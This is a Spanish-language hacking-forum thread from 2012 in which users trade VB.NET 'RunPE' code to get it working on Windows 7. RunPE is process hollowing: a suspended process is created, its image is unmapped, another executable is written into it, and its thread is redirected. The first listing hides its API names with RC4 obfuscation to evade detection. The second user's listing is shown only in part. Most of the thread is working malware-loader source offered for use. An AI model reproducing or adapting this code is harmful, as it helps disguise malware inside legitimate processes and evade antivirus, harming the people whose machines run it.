elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP) (Moderador: kub0x)
| | | |-+  Ayuda RunPe win7
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda RunPe win7  (Leído 4,268 veces)
Cromatico

Desconectado Desconectado

Mensajes: 110


Ver Perfil
Ayuda RunPe win7
« en: 3 Noviembre 2012, 15:24 pm »

Buenos dias! (Almenos aca en Argentina :P)
Queria hacer una consulta, estuve buscando varios runpe programados en vb.net, los cuales me han funcionado perfecto en windows xp con framework 4.0 instalado...

Ahora ninguno, de los aproximadamente 6 runpe que encontre, me funciona en windows seven....

Compilado el ejecutable bajo mi maquina win7 con visual studio 2010, lo ejecuto y me dice:
Error CLR: 80004005.
El programa terminará ahora.


Ahora copio el ejecutable en mi maquina con windows xp + framework 4.0 y se ejecuta correctamente inyectado a un proceso en blanco programado en .net tambien... El problema es que con windows 7 no logro hacer funcionar nada!!
Y obviamente tengo instalado el framework por que me lo instala el visual studio...

Alguna idea??

Gracias gente!


En línea

_katze_

Desconectado Desconectado

Mensajes: 140



Ver Perfil WWW
Re: Ayuda RunPe win7
« Respuesta #1 en: 3 Noviembre 2012, 17:57 pm »

sin codigo no te puedo ayudar! si lo subis mas el compilado asi lo pruebo y te lo corrijo


En línea

Cromatico

Desconectado Desconectado

Mensajes: 110


Ver Perfil
Re: Ayuda RunPe win7
« Respuesta #2 en: 3 Noviembre 2012, 21:15 pm »

Te dejo el codigo con uno de los runpe que funciona en xp y no en 7:

MAIN:
Código:
        Dim X() As Byte
        FileCopy(Application.StartupPath & "\Inject.exe", Application.StartupPath & "\Temp.exe")
        FileCopy(Application.StartupPath & "\Inject.dll", Application.StartupPath & "\IEXPLORE.exe")
        FileOpen(1, Application.StartupPath & "\Temp.exe", OpenMode.Binary)
        ReDim X(0 To LOF(1) - 1)
        FileGet(1, X)
        FileClose(1)
        Call MsgBox("Inyectado correctamente", vbSystemModal, "ASDl")
        RunPE.Iniciar(X, Application.StartupPath & "\IEXPLORE.exe")
        Kill(Application.StartupPath & "\Temp.exe")
        End

Aclaracion: IEXPLORE.EXE es un proyecto de vb.net en blanco, un formulario solo, por que tengo entendido que vb.net puede inyectarse solo en vb.net, entonces cree un proyecto en blanco, en el cual trato de inyectar el codigo, en xp funciona, en seven no...

Y el runpe:
Código:
Imports System.Runtime.InteropServices
Imports System.Text

Public Class RunPE
    Public Class makeapi
        Enum flagginglib As UInteger
            DONT_RESOLVE_DLL_REFERENCES = &H1
            LOAD_IGNORE_CODE_AUTHZ_LEVEL = &H10
            LOAD_LIBRARY_AS_DATAFILE = &H2
            LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE = &H40
            LOAD_LIBRARY_AS_IMAGE_RESOURCE = &H20
            LOAD_WITH_ALTERED_SEARCH_PATH = &H8
        End Enum
        Shared Function rc4(ByVal tgIdqYlTptZIYySGkIfl As String, ByVal hsvKghrWvMoOcupfKZXA As String) As String
            Dim NAkhTayqmyFeznwXFsub As Integer = 0
            Dim SlGZgrJMHyawvBYVPHmH As Integer = hsvKghrWvMoOcupfKZXA.Length
            Dim HVBCaKTKpREAVNDpYwhF As Integer() = New Integer(256) {}
            Dim LunuMzlEYOzMEgSJWCJR As New StringBuilder
            Dim ZfwwZXdWiJbOGhpfKUIY As Integer = 0
            Dim OazalfxhTnyTWJdrzWLi As Integer = 0
            Dim AKucfzcguranHHowPlYk As Integer = 0
            Dim DaLPwiLgsIoUrvVLOEXS As String = String.Empty
            Dim ggIDcYNTbtUtqkRWBISB As Integer = 0
            Dim nPinkvyGjktTycrKexsh As Integer() = New Integer(256) {}
            While NAkhTayqmyFeznwXFsub <= 255
                Dim uWPxdmnlqGXcUZAimogU As Char = (hsvKghrWvMoOcupfKZXA.Substring((NAkhTayqmyFeznwXFsub Mod SlGZgrJMHyawvBYVPHmH), 1).ToCharArray()(0))
                nPinkvyGjktTycrKexsh(NAkhTayqmyFeznwXFsub) = NAkhTayqmyFeznwXFsub
                HVBCaKTKpREAVNDpYwhF(NAkhTayqmyFeznwXFsub) = Microsoft.VisualBasic.Strings.Asc(uWPxdmnlqGXcUZAimogU)
                System.Math.Max(System.Threading.Interlocked.Increment(NAkhTayqmyFeznwXFsub), NAkhTayqmyFeznwXFsub - 1)
            End While
            While OazalfxhTnyTWJdrzWLi <= 255
                AKucfzcguranHHowPlYk = (AKucfzcguranHHowPlYk + nPinkvyGjktTycrKexsh(OazalfxhTnyTWJdrzWLi) + HVBCaKTKpREAVNDpYwhF(OazalfxhTnyTWJdrzWLi)) Mod 256
                Dim cUOouGVJrmnlqbipUhgw As Integer = nPinkvyGjktTycrKexsh(OazalfxhTnyTWJdrzWLi)
                nPinkvyGjktTycrKexsh(OazalfxhTnyTWJdrzWLi) = nPinkvyGjktTycrKexsh(AKucfzcguranHHowPlYk)
                nPinkvyGjktTycrKexsh(AKucfzcguranHHowPlYk) = cUOouGVJrmnlqbipUhgw
                System.Math.Max(System.Threading.Interlocked.Increment(OazalfxhTnyTWJdrzWLi), OazalfxhTnyTWJdrzWLi - 1)
            End While
            NAkhTayqmyFeznwXFsub = 1
            While NAkhTayqmyFeznwXFsub <= tgIdqYlTptZIYySGkIfl.Length
                Dim VxiyRYwVydGLxZPzGNII As Integer = 0
                ggIDcYNTbtUtqkRWBISB = (ggIDcYNTbtUtqkRWBISB + 1) Mod 256
                ZfwwZXdWiJbOGhpfKUIY = (ZfwwZXdWiJbOGhpfKUIY + nPinkvyGjktTycrKexsh(ggIDcYNTbtUtqkRWBISB)) Mod 256
                VxiyRYwVydGLxZPzGNII = nPinkvyGjktTycrKexsh(ggIDcYNTbtUtqkRWBISB)
                nPinkvyGjktTycrKexsh(ggIDcYNTbtUtqkRWBISB) = nPinkvyGjktTycrKexsh(ZfwwZXdWiJbOGhpfKUIY)
                nPinkvyGjktTycrKexsh(ZfwwZXdWiJbOGhpfKUIY) = VxiyRYwVydGLxZPzGNII
                Dim mogUiHKshEsjxOqpddYH As Integer = nPinkvyGjktTycrKexsh((nPinkvyGjktTycrKexsh(ggIDcYNTbtUtqkRWBISB) + nPinkvyGjktTycrKexsh(ZfwwZXdWiJbOGhpfKUIY)) Mod 256)
                Dim MECWMqRqoiWxXTFCSctu As Char = tgIdqYlTptZIYySGkIfl.Substring(NAkhTayqmyFeznwXFsub - 1, 1).ToCharArray()(0)
                VxiyRYwVydGLxZPzGNII = Asc(MECWMqRqoiWxXTFCSctu)
                Dim DSbyfPNYKemcORTEIrls As Integer = VxiyRYwVydGLxZPzGNII Xor mogUiHKshEsjxOqpddYH
                LunuMzlEYOzMEgSJWCJR.Append(Chr(DSbyfPNYKemcORTEIrls))
                System.Math.Max(System.Threading.Interlocked.Increment(NAkhTayqmyFeznwXFsub), NAkhTayqmyFeznwXFsub - 1)
            End While
            DaLPwiLgsIoUrvVLOEXS = LunuMzlEYOzMEgSJWCJR.ToString
            LunuMzlEYOzMEgSJWCJR.Length = 0
            Return DaLPwiLgsIoUrvVLOEXS
        End Function
        Declare Function LoadLibraryExA Lib "kernel32" (ByVal uno As String, ByVal due As IntPtr, ByVal cinque As flagginglib) As IntPtr
        Declare Function GetProcAddress Lib "kernel32" (ByVal tre As IntPtr, ByVal quattro As String) As IntPtr
        Shared Function makemake(Of obj)(ByVal plib As String, ByVal pfunc As String) As obj
            Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryExA(plib, CType(0, IntPtr), flagginglib.LOAD_LIBRARY_AS_DATAFILE), pfunc), GetType(obj)), Object), obj)
        End Function
    End Class

    Delegate Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _
  ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function getthrcontx(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function nunmpsctn(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
    Delegate Function rdprocssmr(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function resmthrd(ByVal hThread As IntPtr) As UInteger
    Delegate Function strthd(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function vrtall(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr

    Public Shared Function Iniciar(ByVal pByteArray As Byte(), ByVal pProcess0Injectto As String) As Boolean
        Try
            Dim num2 As Integer = BitConverter.ToInt32(pByteArray, 60)
            Dim resm As resmthrd = makeapi.makemake(Of resmthrd)("kernel32", "ResumeThread")
            Dim processInfo As IntPtr() = New IntPtr(3) {}
            Dim startupInfo As Byte() = New Byte(67) {}
            Dim crt As CreateProcess = makeapi.makemake(Of CreateProcess)("kernel32", makeapi.rc4("MŒuÖÈvÒö˜þe(„", "junkst"))
            Dim num As Integer = BitConverter.ToInt16(pByteArray, num2 + 6)
            Dim ptr4 As New IntPtr(BitConverter.ToInt32(pByteArray, num2 + &H54))
            Dim gettr As getthrcontx = makeapi.makemake(Of getthrcontx)(makeapi.rc4("p¨°Þ2dí", "pass1"), makeapi.rc4("\¨¶ä?2¾ÑÆ-f1©", "pass1"))
            Dim procAttr As IntPtr = IntPtr.Zero


            If crt(Nothing, New StringBuilder(pProcess0Injectto), procAttr, procAttr, False, 4, _
            procAttr, Nothing, startupInfo, processInfo) Then
                Dim ctxt As UInteger() = New UInteger(178) {}
                ctxt(0) = &H10002
                If gettr(processInfo(1), ctxt) Then
                    Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)

                    Dim buffer__1 As IntPtr = IntPtr.Zero
                    Dim bufferSize As New IntPtr(4)

                    Dim numRead As IntPtr = IntPtr.Zero
                    Dim nunmap As nunmpsctn = makeapi.makemake(Of nunmpsctn)("ntdll", "NtUnmapViewOfSection")
                    Dim readprcsmmry As rdprocssmr = makeapi.makemake(Of rdprocssmr)("kernel32", makeapi.rc4("¥Õ lÕߑÒ7ìâè·ÞîÕ", "pass"))

                    If readprcsmmry(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (nunmap(processInfo(0), buffer__1) = 0) Then
                        Dim addr As New IntPtr(BitConverter.ToInt32(pByteArray, num2 + &H34))
                        Dim size As New IntPtr(BitConverter.ToInt32(pByteArray, num2 + 80))
                        Dim vrtal As vrtall = makeapi.makemake(Of vrtall)("kernel32", "VirtualAllocEx")
                        Dim lpBaseAddress As IntPtr = vrtal(processInfo(0), addr, size, &H3000, &H40)

                        Dim lpNumberOfBytesWritten As Integer
                        Dim wrt As wrtproc = makeapi.makemake(Of wrtproc)("kernel32", makeapi.rc4("aúþìÍ;zä®º2mó¹ý", "junks"))

                        wrt(processInfo(0), lpBaseAddress, pByteArray, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
                        Dim num5 As Integer = num - 1
                        For i As Integer = 0 To num5
                            Dim dst As Integer() = New Integer(9) {}
                            Buffer.BlockCopy(pByteArray, (num2 + &HF8) + (i * 40), dst, 0, 40)
                            Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
                            Buffer.BlockCopy(pByteArray, dst(5), buffer2, 0, buffer2.Length)

                            size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
                            addr = New IntPtr(buffer2.Length)

                            wrt(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
                        Next
                        size = New IntPtr(ctxt(&H29) + 8L)
                        addr = New IntPtr(4)

                        wrt(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
                        ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(pByteArray, num2 + 40))

                        Dim sethre As strthd = makeapi.makemake(Of strthd)("kernel32", "SetThreadContext")

                        sethre(processInfo(1), ctxt)
                    End If
                End If

                resm(processInfo(1))
            End If
        Catch
            Return False
        End Try
        Return True
    End Function
    Delegate Function wrtproc(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
End Class

Gracias katze por el interes!
En línea

Cromatico

Desconectado Desconectado

Mensajes: 110


Ver Perfil
Re: Ayuda RunPe win7
« Respuesta #3 en: 7 Noviembre 2012, 12:46 pm »

Alguna idea o alguien sabe de alguno que funcione en win7?

Gracias!
En línea

_katze_

Desconectado Desconectado

Mensajes: 140



Ver Perfil WWW
Re: Ayuda RunPe win7
« Respuesta #4 en: 8 Noviembre 2012, 02:30 am »

proba amigo con este sino deja que me programo uno de 0
Código
  1. Imports System.Runtime.InteropServices
  2. Imports System.Text
  3.  
  4. Class DD
  5.    <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _
  6. Structure STARTUPINFO
  7.        Public cb As Integer
  8.        Public lpReserved As String
  9.        Public lpDesktop As String
  10.        Public lpTitle As String
  11.        Public dwX As Integer
  12.        Public dwY As Integer
  13.        Public dwXSize As Integer
  14.        Public dwYSize As Integer
  15.        Public dwXCountChars As Integer
  16.        Public dwYCountChars As Integer
  17.        Public dwFillAttribute As Integer
  18.        Public dwFlags As Integer
  19.        Public wShowWindow As Short
  20.        Public cbReserved2 As Short
  21.        Public lpReserved2 As Integer
  22.        Public hStdInput As Integer
  23.        Public hStdOutput As Integer
  24.        Public hStdError As Integer
  25.    End Structure
  26.    Private Structure PROCESS_INFORMATION
  27.        Public hProcess As IntPtr
  28.        Public hThread As IntPtr
  29.        Public dwProcessId As Integer
  30.        Public dwThreadId As Integer
  31.    End Structure
  32.    <StructLayout(LayoutKind.Sequential)> _
  33.    Private Structure IMAGE_DOS_HEADER
  34.        Public e_magic As UInt16
  35.        ' Magic number
  36.        Public e_cblp As UInt16
  37.        ' Bytes on last page of file
  38.        Public e_cp As UInt16
  39.        ' Pages in file
  40.        Public e_crlc As UInt16
  41.        ' Relocations
  42.        Public e_cparhdr As UInt16
  43.        ' Size of header in paragraphs
  44.        Public e_minalloc As UInt16
  45.        ' Minimum extra paragraphs needed
  46.        Public e_maxalloc As UInt16
  47.        ' Maximum extra paragraphs needed
  48.        Public e_ss As UInt16
  49.        ' Initial (relative) SS value
  50.        Public e_sp As UInt16
  51.        ' Initial SP value
  52.        Public e_csum As UInt16
  53.        ' Checksum
  54.        Public e_ip As UInt16
  55.        ' Initial IP value
  56.        Public e_cs As UInt16
  57.        ' Initial (relative) CS value
  58.        Public e_lfarlc As UInt16
  59.        ' File address of relocation table
  60.        Public e_ovno As UInt16
  61.        ' Overlay number
  62.        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> _
  63.        Public e_res1 As UInt16()
  64.        ' Reserved words
  65.        Public e_oemid As UInt16
  66.        ' OEM identifier (for e_oeminfo)
  67.        Public e_oeminfo As UInt16
  68.        ' OEM information; e_oemid specific
  69.        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> _
  70.        Public e_res2 As UInt16()
  71.        ' Reserved words
  72.        Public e_lfanew As Int32
  73.        ' File address of new EXE header
  74.    End Structure
  75.    <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _
  76.    Private Structure VS_VERSIONINFO
  77.        Public wLength As UInt16
  78.        Public wValueLength As UInt16
  79.        Public wType As UInt16
  80.        <MarshalAs(UnmanagedType.ByValTStr, SizeConst:=15)> _
  81.        Public szKey As String
  82.        Public Padding1 As UInt16
  83.    End Structure
  84.    <StructLayout(LayoutKind.Sequential)> _
  85.    Structure SECURITY_ATTRIBUTES
  86.        Public nLength As Integer
  87.        Public lpSecurityDescriptor As IntPtr
  88.        Public bInheritHandle As Integer
  89.    End Structure
  90.    <StructLayout(LayoutKind.Sequential)> _
  91.    Private Structure VS_FIXEDFILEINFO
  92.        Public dwSignature As UInt32
  93.        Public dwStrucVersion As UInt32
  94.        Public dwFileVersionMS As UInt32
  95.        Public dwFileVersionLS As UInt32
  96.        Public dwProductVersionMS As UInt32
  97.        Public dwProductVersionLS As UInt32
  98.        Public dwFileFlagsMask As UInt32
  99.        Public dwFileFlags As UInt32
  100.        Public dwFileOS As UInt32
  101.        Public dwFileType As UInt32
  102.        Public dwFileSubtype As UInt32
  103.        Public dwFileDateMS As UInt32
  104.        Public dwFileDateLS As UInt32
  105.    End Structure
  106.    <StructLayout(LayoutKind.Sequential)> _
  107.    Public Structure FLOATING_SAVE_AREA
  108.  
  109.  
  110.        Public ControlWord As UInteger
  111.        Public StatusWord As UInteger
  112.        Public TagWord As UInteger
  113.        Public ErrorOffset As UInteger
  114.        Public ErrorSelector As UInteger
  115.        Public DataOffset As UInteger
  116.        Public DataSelector As UInteger
  117.        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> _
  118.        Public RegisterArea As Byte()
  119.        Public Cr0NpxState As UInteger
  120.  
  121.    End Structure
  122.    <StructLayout(LayoutKind.Sequential)> _
  123.    Public Structure CONTEXT
  124.  
  125.  
  126.        Public ContextFlags As UInteger
  127.        'set this to an appropriate value
  128.        ' Retrieved by CONTEXT_DEBUG_REGISTERS
  129.        Public Dr0 As UInteger
  130.        Public Dr1 As UInteger
  131.        Public Dr2 As UInteger
  132.        Public Dr3 As UInteger
  133.        Public Dr6 As UInteger
  134.        Public Dr7 As UInteger
  135.        ' Retrieved by CONTEXT_FLOATING_POINT
  136.        Public FloatSave As FLOATING_SAVE_AREA
  137.        ' Retrieved by CONTEXT_SEGMENTS
  138.        Public SegGs As UInteger
  139.        Public SegFs As UInteger
  140.        Public SegEs As UInteger
  141.        Public SegDs As UInteger
  142.        ' Retrieved by CONTEXT_INTEGER
  143.        Public Edi As UInteger
  144.        Public Esi As UInteger
  145.        Public Ebx As UInteger
  146.        Public Edx As UInteger
  147.        Public Ecx As UInteger
  148.        Public Eax As UInteger
  149.        ' Retrieved by CONTEXT_CONTROL
  150.        Public Ebp As UInteger
  151.        Public Eip As UInteger
  152.        Public SegCs As UInteger
  153.        Public EFlags As UInteger
  154.        Public Esp As UInteger
  155.        Public SegSs As UInteger
  156.        ' Retrieved by CONTEXT_EXTENDED_REGISTERS
  157.        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> _
  158.        Public ExtendedRegisters As Byte()
  159.  
  160.    End Structure
  161.    <StructLayout(LayoutKind.Sequential)> _
  162.  Public Structure IMAGE_OPTIONAL_HEADER32
  163.        '
  164.        ' Standard fields.
  165.        '
  166.        Public Magic As UInt16
  167.        Public MajorLinkerVersion As [Byte]
  168.        Public MinorLinkerVersion As [Byte]
  169.        Public SizeOfCode As UInt32
  170.        Public SizeOfInitializedData As UInt32
  171.        Public SizeOfUninitializedData As UInt32
  172.        Public AddressOfEntryPoint As UInt32
  173.        Public BaseOfCode As UInt32
  174.        Public BaseOfData As UInt32
  175.        '
  176.        ' NT additional fields.
  177.        '
  178.        Public ImageBase As UInt32
  179.        Public SectionAlignment As UInt32
  180.        Public FileAlignment As UInt32
  181.        Public MajorOperatingSystemVersion As UInt16
  182.        Public MinorOperatingSystemVersion As UInt16
  183.        Public MajorImageVersion As UInt16
  184.        Public MinorImageVersion As UInt16
  185.        Public MajorSubsystemVersion As UInt16
  186.        Public MinorSubsystemVersion As UInt16
  187.        Public Win32VersionValue As UInt32
  188.        Public SizeOfImage As UInt32
  189.        Public SizeOfHeaders As UInt32
  190.        Public CheckSum As UInt32
  191.        Public Subsystem As UInt16
  192.        Public DllCharacteristics As UInt16
  193.        Public SizeOfStackReserve As UInt32
  194.        Public SizeOfStackCommit As UInt32
  195.        Public SizeOfHeapReserve As UInt32
  196.        Public SizeOfHeapCommit As UInt32
  197.        Public LoaderFlags As UInt32
  198.        Public NumberOfRvaAndSizes As UInt32
  199.        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> _
  200.        Public DataDirectory As IMAGE_DATA_DIRECTORY()
  201.    End Structure
  202.    <StructLayout(LayoutKind.Sequential)> _
  203. Public Structure IMAGE_FILE_HEADER
  204.        Public Machine As UInt16
  205.        Public NumberOfSections As UInt16
  206.        Public TimeDateStamp As UInt32
  207.        Public PointerToSymbolTable As UInt32
  208.        Public NumberOfSymbols As UInt32
  209.        Public SizeOfOptionalHeader As UInt16
  210.        Public Characteristics As UInt16
  211.    End Structure
  212.    <StructLayout(LayoutKind.Sequential)> _
  213. Public Structure IMAGE_DATA_DIRECTORY
  214.        Public VirtualAddress As UInt32
  215.        Public Size As UInt32
  216.    End Structure
  217.    Public Structure IMAGE_NT_HEADERS
  218.        Public Signature As UInt32
  219.        Public FileHeader As IMAGE_FILE_HEADER
  220.        Public OptionalHeader As IMAGE_OPTIONAL_HEADER32
  221.    End Structure
  222.    Public Enum IMAGE_SIZEOF_SHORT_NAME
  223.        IMAGE_SIZEOF_SHORT_NAME = 8
  224.    End Enum
  225.    Public Structure Misc
  226.        Public PhysicalAddress As System.UInt32
  227.        Public VirtualSize As System.UInt32
  228.    End Structure
  229.    Public Structure IMAGE_SECTION_HEADER
  230.        Public Name As System.Byte
  231.        Public Misc As Misc
  232.        Public VirtualAddress As System.UInt32
  233.        Public SizeOfRawData As System.UInt32
  234.        Public PointerToRawData As System.UInt32
  235.        Public PointerToRelocations As System.UInt32
  236.        Public PointerToLinenumbers As System.UInt32
  237.        Public NumberOfRelocations As System.UInt16
  238.        Public NumberOfLinenumbers As System.UInt16
  239.        Public Characteristics As System.UInt32
  240.    End Structure
  241.  
  242.    Public Const CONTEXT_X86 = &H10000
  243.    Public Const CONTEXT86_CONTROL = (CONTEXT_X86 Or &H1)          'SS:SP, CS:IP, FLAGS, BP
  244.    Public Const CONTEXT86_INTEGER = (CONTEXT_X86 Or &H2)          'AX, BX, CX, DX, SI, DI
  245.    Public Const CONTEXT86_SEGMENTS = (CONTEXT_X86 Or &H4)         'DS, ES, FS, GS
  246.    Public Const CONTEXT86_FLOATING_POINT = (CONTEXT_X86 Or &H8)   '387 state
  247.    Public Const CONTEXT86_DEBUG_REGISTERS = (CONTEXT_X86 Or &H10) 'DB 0-3,6,7
  248.    Public Const CONTEXT86_FULL = (CONTEXT86_CONTROL Or CONTEXT86_INTEGER Or CONTEXT86_SEGMENTS)
  249.    Public Const CREATE_SUSPENDED = &H4
  250.    Public Const MEM_COMMIT As Long = &H1000&
  251.    Public Const MEM_RESERVE As Long = &H2000&
  252.    Public Const PAGE_NOCACHE As Long = &H200
  253.    Public Const PAGE_EXECUTE_READWRITE As Long = &H40
  254.    Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
  255.    Public Const PAGE_EXECUTE_READ As Long = &H20
  256.    Public Const PAGE_EXECUTE As Long = &H10
  257.    Public Const PAGE_WRITECOPY As Long = &H8
  258.    Public Const PAGE_NOACCESS As Long = &H1
  259.    Public Const PAGE_READWRITE As Long = &H4
  260.  
  261.    <DllImport("kernel32.dll")> _
  262.    Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInt32
  263.    End Function
  264.    <DllImport("kernel32.dll")> _
  265.    Private Shared Function GetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean
  266.    End Function
  267.    <DllImport("kernel32.dll")> _
  268.    Private Shared Function SetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean
  269.    End Function
  270.  
  271.    <DllImport("kernel32.dll")> _
  272.    Private Shared Function LoadLibraryA(ByVal lpLibFileName As String) As Integer
  273.    End Function
  274.    <DllImport("kernel32.dll")> _
  275.    Private Shared Function CreateProcess(ByVal lpApplicationName As String, _
  276.    ByVal lpCommandLine As String, ByRef lpProcessAttributes As SECURITY_ATTRIBUTES, _
  277.     ByRef lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Boolean, _
  278.    ByVal dwCreationFlags As UInt32, ByVal lpEnvironment As IntPtr, ByVal lpCurrentDirectory As String, _
  279.   <[In]()> ByRef lpStartupInfo As STARTUPINFO, _
  280.   <[Out]()> ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean
  281.    End Function
  282.  
  283.    <DllImport("kernel32.dll", _
  284.    SetLastError:=True, _
  285.    CharSet:=CharSet.Auto, _
  286.    EntryPoint:="WriteProcessMemory", _
  287.    CallingConvention:=CallingConvention.StdCall)> _
  288. Shared Function WriteProcessMemory( _
  289. ByVal hProcess As IntPtr, _
  290. ByVal lpBaseAddress As IntPtr, _
  291. ByVal lpBuffer As Byte(), _
  292. ByVal iSize As Int32, _
  293. <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean
  294.    End Function
  295.    <DllImport("kernel32.dll", _
  296. SetLastError:=True, _
  297. CharSet:=CharSet.Auto, _
  298. EntryPoint:="WriteProcessMemory", _
  299. CallingConvention:=CallingConvention.StdCall)> _
  300. Shared Function WriteProcessMemoryI( _
  301. ByVal hProcess As IntPtr, _
  302. ByVal lpBaseAddress As IntPtr, _
  303. ByVal lpBuffer As IntPtr, _
  304. ByVal iSize As Int32, _
  305. <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean
  306.    End Function
  307.    <DllImport("kernel32.dll", EntryPoint:="ReadProcessMemory")> _
  308.    Public Shared Function ReadProcessMemory(ByVal hProcess As IntPtr, _
  309.    ByVal lpBaseAddress As Integer, _
  310.    ByRef lpbuffer As IntPtr, _
  311.    ByVal size As Integer, _
  312.    ByRef lpNumberOfBytesRead As Integer) As Int32
  313.    End Function
  314.    <DllImport("ntdll.dll")> _
  315.    Public Shared Function ZwUnmapViewOfSection(ByVal hProcess As IntPtr, ByVal BaseAddress As IntPtr) As Long
  316.    End Function
  317.  
  318.    <DllImport("kernel32.dll", SetLastError:=True, ExactSpelling:=True)> _
  319.    Public Shared Function VirtualAllocEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, _
  320.    ByVal dwSize As UInteger, ByVal flAllocationType As UInteger, _
  321.    ByVal flProtect As UInteger) As IntPtr
  322.    End Function
  323.    <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
  324.    Public Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UIntPtr, ByVal flNewProtect As UIntPtr, <Out()> ByVal lpflOldProtect As UInteger) As Integer
  325.    End Function
  326.  
  327.    Const GENERIC_READ As Int32 = &H80000000
  328.    Const FILE_SHARE_READ As UInt32 = &H1
  329.    Const OPEN_EXISTING As UInt32 = 3
  330.    Const FILE_ATTRIBUTE_NORMAL As UInt32 = &H80
  331.    Const INVALID_HANDLE_VALUE As Int32 = -1
  332.    Const PAGE_READONLY As UInt32 = &H2
  333.    Const FILE_MAP_READ As UInt32 = &H4
  334.    Const IMAGE_DOS_SIGNATURE As UInt16 = &H5A4D
  335.    Const RT_VERSION As Int32 = 16
  336.  
  337.    Private Enum ImageSignatureTypes
  338.        IMAGE_DOS_SIGNATURE = &H5A4D     ''\\ MZ
  339.        IMAGE_OS2_SIGNATURE = &H454E     ''\\ NE
  340.        IMAGE_OS2_SIGNATURE_LE = &H454C  ''\\ LE
  341.        IMAGE_VXD_SIGNATURE = &H454C     ''\\ LE
  342.        IMAGE_NT_SIGNATURE = &H4550      ''\\ PE00
  343.    End Enum
  344.  
  345.    Public Shared Sub SRexec(ByVal b() As Byte, ByVal sVictim As String)
  346.        Dim sVersion As [String] = Nothing
  347.        Dim pidh As IMAGE_DOS_HEADER
  348.        Dim context As CONTEXT = New CONTEXT()
  349.  
  350.        Dim Pinh As IMAGE_NT_HEADERS
  351.        Dim Pish As IMAGE_SECTION_HEADER
  352.  
  353.        Dim pi As PROCESS_INFORMATION = New PROCESS_INFORMATION()
  354.        Dim si As STARTUPINFO = New STARTUPINFO()
  355.  
  356.        Dim pSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES()
  357.        Dim tSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES()
  358.  
  359.        'converts a data type in another type.
  360.        'since .net types are different from types handle by winAPI,  DirectCall a API will cause a type mismatch, since .net types
  361.        ' structure is completely different, using different resources.
  362.        Dim MyGC As GCHandle = GCHandle.Alloc(b, GCHandleType.Pinned)
  363.        Dim ptbuffer As Integer = MyGC.AddrOfPinnedObject.ToInt32
  364.        pidh = Marshal.PtrToStructure(MyGC.AddrOfPinnedObject, pidh.GetType)
  365.        MyGC.Free()
  366.  
  367.        If CreateProcess(Nothing, sVictim, pSec, tSec, False, &H4, Nothing, Nothing, si, pi) = 0 Then
  368.            Exit Sub
  369.        End If
  370.  
  371.        Dim vt As Integer = ptbuffer + pidh.e_lfanew
  372.        Pinh = Marshal.PtrToStructure(New IntPtr(vt), Pinh.GetType)
  373.  
  374.        Dim addr As Long, lOffset As Long, ret As UInteger
  375.        si.cb = Len(si)
  376.        context.ContextFlags = CONTEXT86_INTEGER
  377.  
  378.        'all "IF" are only for better understanding, you could do all verification on the builder and then the rest on the stub
  379.        If Pinh.Signature <> ImageSignatureTypes.IMAGE_NT_SIGNATURE Or pidh.e_magic <> ImageSignatureTypes.IMAGE_DOS_SIGNATURE Then Exit Sub
